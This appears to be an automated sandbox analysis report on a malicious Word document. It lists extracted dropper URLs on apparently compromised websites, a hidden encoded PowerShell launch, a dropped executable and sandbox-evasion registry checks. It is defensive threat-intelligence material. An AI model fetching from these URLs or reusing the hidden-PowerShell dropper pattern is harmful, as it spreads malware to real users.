Analysis
  Max time kernel: 22s
  Resource: win10v191014
  Submitted: 13-12-2019 16:11

General
  Target: 56bb78c724fd0859c5350bd16ea2383fc4f8715fa389f7a4ec4df560ce5f9792.doc
  Sample: 191213-valqpjagqx
  SHA256: 56bb78c724fd0859c5350bd16ea2383fc4f8715fa389f7a4ec4df560ce5f9792
  Score: 8/10
Malware Config
  Extracted
  Language: ps1

  Source       URL
  exe.dropper  https://bahcelievler-rotary.org/wp-admin/x4PHK0/
  exe.dropper  https://sageth.net/wp-content/fu9yz/
  exe.dropper  https://newlandred.com/wp-snapshots/CsfcooA/
  exe.dropper  https://hellothuoctot.com/wp-content/VzMjXw/
  exe.dropper  http://www.enegix.com/wp-includes/21fap/
Signatures

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid   process
    4992  WINWORD.EXE

Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    pid   process
    4992  WINWORD.EXE
    4796  611.exe

Suspicious use of FindShellTrayWindow (1 IoC)
  Processes:
    pid   process
    4992  WINWORD.EXE

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  4668  Powershell.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
    pid   process
    4668  Powershell.exe

Suspicious use of WriteProcessMemory (2 IoCs)
  Processes:
    description                       pid   process           target process
    PID 4048 wrote to memory of 4524  4048  SppExtComObj.exe  SLUI.exe
    PID 4668 wrote to memory of 4796  4668  Powershell.exe    611.exe

Executes dropped EXE (1 IoC)
  Processes:
    pid   process
    4796  611.exe

Checks system information in the registry (2 TTPs, 2 IoCs)
  System information is often read in order to detect sandboxing environments.
  Processes:
    description        ioc
    Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
    Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName

Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description        ioc
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description        ioc
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\56bb78c724fd0859c5350bd16ea2383fc4f8715fa389f7a4ec4df560ce5f9792.doc" /o ""
  PID: 4992
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of FindShellTrayWindow

C:\Windows\system32\SppExtComObj.exe
  Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
  PID: 4048
  - Suspicious use of WriteProcessMemory

  Child: C:\Windows\System32\SLUI.exe
    Command line: "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
    PID: 4524

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Command line: Powershell -w hidden -en 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
  PID: 4668
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  Child: C:\Users\Admin\611.exe
    Command line: "C:\Users\Admin\611.exe"
    PID: 4796
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE